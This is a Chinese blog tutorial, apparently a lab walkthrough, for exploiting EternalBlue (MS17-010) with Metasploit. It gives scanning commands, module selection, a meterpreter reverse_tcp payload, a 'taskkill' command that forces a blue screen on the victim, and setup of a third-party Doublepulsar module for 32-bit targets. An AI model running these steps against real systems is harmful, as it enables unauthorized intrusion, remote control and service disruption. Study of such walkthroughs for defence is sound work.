永恒之蓝 ms17-010

2023-10-25 05:04
文章标签 010 ms17 永恒

本文主要是介绍永恒之蓝 ms17-010,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • 永恒之蓝 ms17-010
    • 1. 漏洞介绍
      • 1.1 影响版本
      • 1.2 漏洞原理
    • 2. 信息收集
      • 2.1 主机扫描
      • 2.2 端口扫描
    • 3. 漏洞探测
    • 4. 漏洞利用
    • 5. 特殊情况
      • 5.1 安装wine32环境
      • 5.2 安装攻击32位操作系统所用的的脚本

永恒之蓝 ms17-010

很久之前做过的永恒之蓝漏洞…

1. 漏洞介绍

永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

1.1 影响版本

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

1.2 漏洞原理

通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。

2. 信息收集

2.1 主机扫描

arp-scan -l

image-20231024200826004

2.2 端口扫描

nmap -O -sS -T4 192.168.188.222

image-20231024202435170

3. 漏洞探测

msfconsole
# 搜寻模块
search ms17-010

image-20231024203415111

# 使用第三个模块
use 3
# 查看该漏洞模块的具体介绍信息
info

image-20231024203658160

使用show options选项,查看我们要输入的具体参数,其中标注了yes的选项是必须的参数,若这个参数为空,则需要我们填写。

show options

image-20231024203822659

RHOSTS选项为空,需要填写,RHOSTS代表要攻击的目标。输入r然后按tab键可以自动补全该参数。

set rhosts 192.168.188.222

显示该主机很可能能够会受到永恒之蓝漏洞的攻击。

run

image-20231024204251498

4. 漏洞利用

search 17-010

image-20231024204458680

设置payload连接的方式,reverse_tcp为反向连接,即受害机主动连接攻击机,以获取shell。

set payload windows/x64/meterpreter/reverse_tcp

设置攻击目标

set rhosts 192.168.188.222
run

image-20231024204727030

拿下该主机的shell,执行cmd命令。

getuid

image-20231024204750610

ipconfig

image-20231024204855411

蓝屏攻击

taskkill /f /fi "pid ne 1"

命令解析:

  • 用于在 Windows 操作系统中终止进程的命令。它的作用是强制结束所有除了系统进程(PID为1)之外的其他进程。

  • 在 Windows 操作系统中,进程标识符(PID)为 1 的进程通常是系统进程,也称为"System"进程或"System Idle Process"进程。这个进程是操作系统内核的一部分,负责管理和调度其他进程的运行。

image-20231024205108393

image-20231024205022404

5. 特殊情况

由于不知道目标操作系统是32位还是64位的,我们在使用ms17010攻击模块的时候常规使用64位来进行攻击。

如果在攻击的时候,出现攻击失败等提示信息,那么说明该模块只能攻击64位操作系统,也说明了目标靶机是32位的操作系统。

5.1 安装wine32环境

apt-get install wine32

在执行exploit时可能会出现 :

it looks like wine32 is missing, you should install it.multiarch needs to be enabled first. as root, pleaseexecute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"

按照上面的方法dpkg --add-architecture i386 && apt-get update && apt-get install wine32即可

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

验证是否安装成功

wine --version

用wine32执行cmd.exe

wine cmd.exe

5.2 安装攻击32位操作系统所用的的脚本

首先下载利用的脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd Eternalblue-Doublepulsar-Metasploit/cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

接下来使用exploit模块(步骤同上,原理同上)

msfconsolesearch eternalblue  #或者search ms17-010

如果在成功打过去了,但是一直频繁的刷shell的信息,就是回弹不出shell的终端,这个是为什么?

  • 防火墙或安全软件阻止了反向连接:目标系统上可能配置了防火墙或安全软件,阻止了从被攻击系统回连到攻击者控制的服务器的连接。这样一来,即使成功执行了恶意代码,也无法建立与攻击者服务器的连接,导致无法回弹 shell。
  • 网络配置问题:目标系统的网络配置可能存在问题,例如无法访问互联网、网络隔离等,导致无法回连到攻击者的服务器。
  • 安全补丁或安全措施:目标系统可能已经应用了相关的安全补丁或采取了其他安全措施,修复了永恒之蓝漏洞或阻止了其利用。这样一来,攻击者无法成功利用漏洞,也无法回弹 shell。

这篇关于永恒之蓝 ms17-010的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/280203

相关文章

MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

目录 一、漏洞简介 漏洞原理 影响版本 二、漏洞复现 三、复现过程 1、扫描局域网内的C段主机(主机发现) 扫描结果: 2.使用MSF的永恒之蓝漏洞模块 3.对主机进行扫描,查看其是否有永恒之蓝漏洞 4.准备攻击 四、漏洞利用 五、提升权限 1.创建新用户 2.将用户添加至管理员群组 3.查看端口的开启情况 六、远程登录 七、漏洞修复 一、漏洞简介 永

PAT-L1-010. 比较大小

L1-010. 比较大小 时间限制 400 ms 内存限制 65536 kB 代码长度限制 8000 B 判题程序 Standard 作者 杨起帆(浙江大学城市学院) 本题要求将输入的任意3个整数从小到大输出。 输入格式: 输入在一行中给出3个整数,其间以空格分隔。 输出格式: 在一行中将3个整数从小到大输出,其间以“->”相连。 输入样例

meterpeter基础及永恒之蓝漏洞利用

meterpeter基础知识 meterpeter为渗透测试框架,主要用于后渗透模块 后渗透:拿到shell后进行的操作(远程,权限维持,入侵痕迹清除,上机关闭杀毒软件) msf能干什么 相当于一个漏洞库(信息收集,漏洞检测,漏洞利用,payload,shellcode:攻击载荷,poc,exp,病毒木马文件生成) 前提:已知软件漏洞,专业漏洞攻击工具 一般用来打nday(例:永恒之蓝,心脏

Java笔试面试题010

1、说说下面语句是否有错误,或可能出现的缺陷,并指出错误,或缺陷在哪里? public class MyFile implements Runnable{        public voidrun(){               while(true){                      try{                             FileReader

Python 扫雷游戏【含Python源码 MX_010期】

简介: 游戏开始时,玩家会看到一个方格矩阵,其中一些方格下面藏有地雷,而其他方格则是空的。玩家可以通过输入坐标来选择方格,以揭开方格下隐藏的内容。如果揭开的方格下有地雷,则游戏失败;否则,揭开的方格会显示出周围有多少颗地雷。根据揭开的方格周围地雷的数量,玩家可以推断出哪些方格是安全的,哪些方格可能有地雷。玩家可以标记可能有地雷的方格,以防止误触。如果玩家标记的方格确实有地雷,则游戏会给予反馈。

[原则-010]如何成为一个初级java码农

列个大纲。想学的可以按照这个步骤来。 1. 《疯狂java》,把整本书题题过一遍。 2. 《Java数据结构和算法》,老外写的,算法刷一遍。数据结构不要看中国人写的书。但julyedu.com的东东可以都搞一遍。 3. 学会用eclipse,找个高手给你演示一遍。然后用它做项目。 4. 在github上找一个知名而简短的开源java项目,读懂代码,然后自己重写一遍。 5. 去猎聘网和拉勾网,找j

[rust-010]Rust没有空值及其Option<T>解决方案

主要参考文档: https://doc.rust-lang.org/book/ch06-01-defining-an-enum.html https://blog.csdn.net/readlnh/article/details/86613747 空值,表示没有值。如果一个语言有“空值”,那么任何变量有两种可能:有值,“空值”。 在Java里,空值用null表示。null是一个特殊的东西,

python-win10跑通chattts笔记(亲测可跑)0.8.010

python-win10跑通chattts笔记-亲测可跑 背景项目地址安装过程使用技巧参考链接 背景 克隆了项目中的代码,在无conda环境下使用pip安装了依赖,最后报错cl: 命令行 error D8021 :无效的数值参数“/Wno-register” error: command 'C:\,最后通过使用conda解决了,以此记录下 项目地址 https://gitc

Kimichat使用案例010:快速识别出图片中的表格保存到Excel

文章目录 一、介绍二、图片信息三、输入内容四、输出内容五、markdown提示词六、markdown输出 一、介绍   如果有一张图片格式的表格,想要快速复制到Excel表格中,那么一般要借助于OCR工具。之前试过不少在线OCR工具,识别效果差强人意。其实,kimichat就可以非常好的完成这个任务。 二、图片信息   下面是一张研报中的表格,只能以图片形式保存:

永恒之蓝(MS17-010)详解

这个漏洞还蛮重要的,尤其在内网渗透和权限提升。 目录 SMB简介 SMB工作原理 永恒之蓝简原理 影响版本 漏洞复现 复现准备 复现过程 修复建议 SMB简介 SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居都是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP